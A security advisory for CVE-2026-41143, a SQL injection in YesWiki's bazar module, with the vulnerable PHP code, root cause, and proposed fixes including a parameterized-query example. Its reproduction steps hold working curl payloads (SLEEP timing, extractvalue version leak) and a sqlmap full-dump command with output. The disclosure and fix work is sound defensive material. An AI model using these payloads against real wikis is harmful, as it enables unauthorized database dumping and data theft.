CVE-2026-41143
PHP vulnerability analysis and mitigation

Vulnerability Details

YesWiki's bazar module contains a SQL injection vulnerability in tools/bazar/services/EntryManager.php at line 704. The $data['id_fiche'] value (sourced from $_POST['id_fiche']) is concatenated directly into a raw SQL query without any sanitization or parameterization.

Vulnerable Code (EntryManager.php:704):

$result = $this->dbService->loadSingle(
    'SELECT MIN(time) as firsttime FROM ' . $this->dbService->prefixTable('pages') .
    " WHERE tag='" . $data['id_fiche'] . "'"
);

Attack Path:

  1. Attacker authenticates as any user (route requires acl:{"+"})
  2. POST /api/entries/{formId} with id_fiche=' OR SLEEP(3) OR '
  3. ApiController::createEntry() checks isEntry($_POST['id_fiche']) → false (not existing entry) → calls create()
  4. create() → formatDataBeforeSave() → SQL injection at line 704

dbService->loadSingle() passes the raw string to mysqli_query() with no escaping. The escape() method exists but is NOT called here.

Docker PoC confirmation:

  • Normal query: SELECT MIN(time) as firsttime FROM wiki_pages WHERE tag='TestEntry' → 2024-01-01 00:00:00
  • Injected: WHERE tag='' OR SLEEP(3) OR '' → elapsed: 3.00s (SLEEP confirmed)
  • Time-based blind SQLi enables full database dump via binary search

Steps to Reproduce

Prerequisites: Any authenticated user account on a YesWiki instance with a bazar form (id_typeannonce) created.

Step 1 – Obtain session cookie (standard login via web UI or API)

Step 2 – Time-based blind SQLi (confirm vulnerability):

curl -s -X POST 'http://TARGET/?api/entries/1' \
  -H 'Cookie: wikini_session=<SESSION>' \
  -d "antispam=1&bf_titre=TestTitle&id_fiche=' OR SLEEP(3) OR '"

→ Response delays ~3 seconds, confirming SQL injection.

Step 3 – Error-based SQLi (version exfil):

curl -s -X POST 'http://TARGET/?api/entries/1' \
  -H 'Cookie: wikini_session=<SESSION>' \
  -d "antispam=1&bf_titre=TestTitle&id_fiche=' AND extractvalue(1,concat(0x7e,@@version))-- -"

→ Returns MySQL version in XPATH error: XPATH syntax error: '~8.4.8'

Step 4 – Full dump via sqlmap:

sqlmap -u 'http://TARGET/?api/entries/1' \
  --data "antispam=1&bf_titre=T&id_fiche=test" \
  -p id_fiche --cookie "wikini_session=<SESSION>" \
  --dbms=MySQL --technique=BET --level=2

Docker PoC Output (confirmed)

[STEP 1] Normal input: Result (2024-01-01 00:00:00)
[STEP 2] id_fiche=' OR SLEEP(3) OR '  → Elapsed: 3.00s ← SLEEP(3) CONFIRMED
[STEP 3] id_fiche=' AND extractvalue(1,concat(0x7e,@@version))-- -
         DB_ERROR: (1105, "XPATH syntax error: '~8.4.8'")

Root Cause

In tools/bazar/services/EntryManager.php line 704:

$result = $this->dbService->loadSingle(
    'SELECT MIN(time) as firsttime FROM ' . $this->dbService->prefixTable('pages') .
    " WHERE tag='" . $data['id_fiche'] . "'"
);

$data['id_fiche'] comes from $_POST['id_fiche'] (user input). DbService::escape() exists but is not called here. loadSingle() passes the raw string directly to mysqli_query().

Proposed Fix

Replace the vulnerable line with a parameterized query, or at minimum escape the value with $this->dbService->escape() before interpolating it into the quoted literal:

// Escape quote characters in the user-supplied tag; the value must stay inside single quotes for this to be safe.
$tag = $this->dbService->escape($data['id_fiche']);
$result = $this->dbService->loadSingle(
    'SELECT MIN(time) as firsttime FROM ' . $this->dbService->prefixTable('pages') .
    " WHERE tag='" . $tag . "'"
);
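The following is an added example of the parameterized alternative, written against the mysqli API that DbService wraps. It is not YesWiki's own code and not the fix the project shipped. The helper name firstTimeForTag() and the getLink() accessor on DbService are assumptions; prefixTable('pages') is from the page. The table name is an identifier and cannot be bound as a parameter, so it stays in the SQL text (quoted as an identifier); only the user-controlled tag is bound.

```php
<?php
// Added example (not YesWiki's own code): hardened replacement for the
// EntryManager.php:704 query. The user-supplied tag is bound as a string
// parameter, so quotes, OR, SLEEP() and similar in the value are sent to the
// server as data and are never parsed as SQL.
//
// Assumptions (hypothetical, not taken from YesWiki's DbService API):
//   - $this->dbService->getLink() returns the underlying mysqli connection
//   - $this->dbService->prefixTable('pages') returns the prefixed table name
//     (from the page; it comes from configuration, never from user input)

function firstTimeForTag(mysqli $link, string $pagesTable, string $tag): ?string
{
    // A table name is an identifier and cannot be a bound parameter. Quote it
    // with backticks (doubling any embedded backtick) instead of trusting it.
    $table = '`' . str_replace('`', '``', $pagesTable) . '`';

    // Note the explicit space before WHERE; the value slot is a placeholder.
    $sql = 'SELECT MIN(time) AS firsttime FROM ' . $table . ' WHERE tag = ?';

    $stmt = $link->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $link->error);
    }

    // 's' = bind as string. The value travels separately from the query text.
    $stmt->bind_param('s', $tag);
    if (!$stmt->execute()) {
        $error = $stmt->error;
        $stmt->close();
        throw new RuntimeException('execute failed: ' . $error);
    }

    // bind_result()/fetch() works without mysqlnd, unlike get_result().
    // MIN() over an empty set yields one row with NULL, so fetch() returns
    // true and $firsttime is null when no page carries this tag.
    $firsttime = null;
    $stmt->bind_result($firsttime);
    $found = $stmt->fetch();
    $stmt->close();

    return $found ? $firsttime : null;
}

// Usage inside formatDataBeforeSave(), replacing the loadSingle() call
// (getLink() is an assumed accessor; adapt to the real DbService API):
//
// $firsttime = firstTimeForTag(
//     $this->dbService->getLink(),
//     $this->dbService->prefixTable('pages'),
//     (string) $data['id_fiche']
// );
```

The escape()-based variant above remains acceptable only because the escaped value sits inside single quotes: mysqli_real_escape_string() neutralizes quote characters within a quoted literal and does nothing for a value interpolated into an unquoted position. A prepared statement removes that dependency entirely, and the same placeholder pattern should be applied to any other query in EntryManager.php that builds SQL by concatenation from request data.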

PoC Screenshot (image not included on this page)

Caption: PoC: SLEEP(3) confirmed + MySQL version exfil

Source: NVD

Related PHP vulnerabilities:

CVE ID              | Severity | Score | Technologies | Component name     | CISA KEV exploit | Has fix | Published date
GHSA-8q4h-8crm-5cvc | HIGH     | 8.9   | PHP          | studio-42/elfinder | No               | Yes     | Apr 17, 2026
CVE-2026-41143      | HIGH     | 8.8   | PHP          | yeswiki/yeswiki    | No               | Yes     | Apr 18, 2026
GHSA-qrr6-mg7r-m243 | HIGH     | 7.8   | PHP          | phpunit/phpunit    | No               | Yes     | Apr 18, 2026
CVE-2026-40479      | MEDIUM   | 5.4   | PHP          | kimai/kimai        | No               | Yes     | Apr 17, 2026
CVE-2026-40486      | MEDIUM   | 4.3   | PHP          | kimai/kimai        | No               | Yes     | Apr 17, 2026
